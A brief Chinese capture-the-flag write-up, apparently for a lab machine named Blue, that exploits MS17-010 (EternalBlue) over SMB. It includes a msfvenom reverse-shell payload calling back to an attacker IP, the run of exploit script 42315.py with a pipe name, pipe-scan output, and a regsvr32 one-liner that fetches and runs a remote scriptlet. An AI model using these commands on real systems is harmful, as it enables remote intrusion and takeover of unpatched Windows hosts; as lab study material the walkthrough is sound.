Blue(永恒之蓝)

nmap扫描发现139,445端口开启,再加上靶机名叫blue,很容易想到17-010

图片.png

直接改17-010的py脚本
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)

把原来注释的两行,改改

图片.png

同时我们需要生产一个exe文件,来让目标靶机执行
msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.14.5 lport=5678 -f exe > /tmp/exp.exe

存放的路径要跟脚本的路径对应起来

脚本执行的时候,需要有pipe name,用来把exe文件传到靶机上

msf中的auxiliary/scanner/smb/pipe_auditor模块,可以扫描到开放的pipe

msf5 auxiliary(scanner/smb/pipe_auditor) > exploit

[+] 10.10.10.40:445       - Pipes: \netlogon, \lsarpc, \samr, \browser, \atsvc, \epmapper, \eventlog, \InitShutdown, \keysvc, \lsass, \LSM_API_ser             vice, \ntsvcs, \plugplay, \protected_storage, \scerpc, \srvsvc, \trkwks, \wkssvc
[*] 10.10.10.40:          - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

执行脚本,并且从pipe扫描中随便拿一个用,同时另外一边开启nc监听
python 42315.py 10.10.10.40 lsarpc

图片.png

还有另一正思路,虽然没成功

直接让目标靶机执行命令

图片.png
use exploit/multi/script/web_delivery
set target 3
set payload windows/meterpreter/bind_tcp
set rhost 10.10.10.40
exploit

regsvr32 /s /n /u /i:regsvr32 /s /n /u /i:http://10.10.14.5:9999/xE1H8gb6.sct scrobj.dll

你可能感兴趣的:(Blue(永恒之蓝))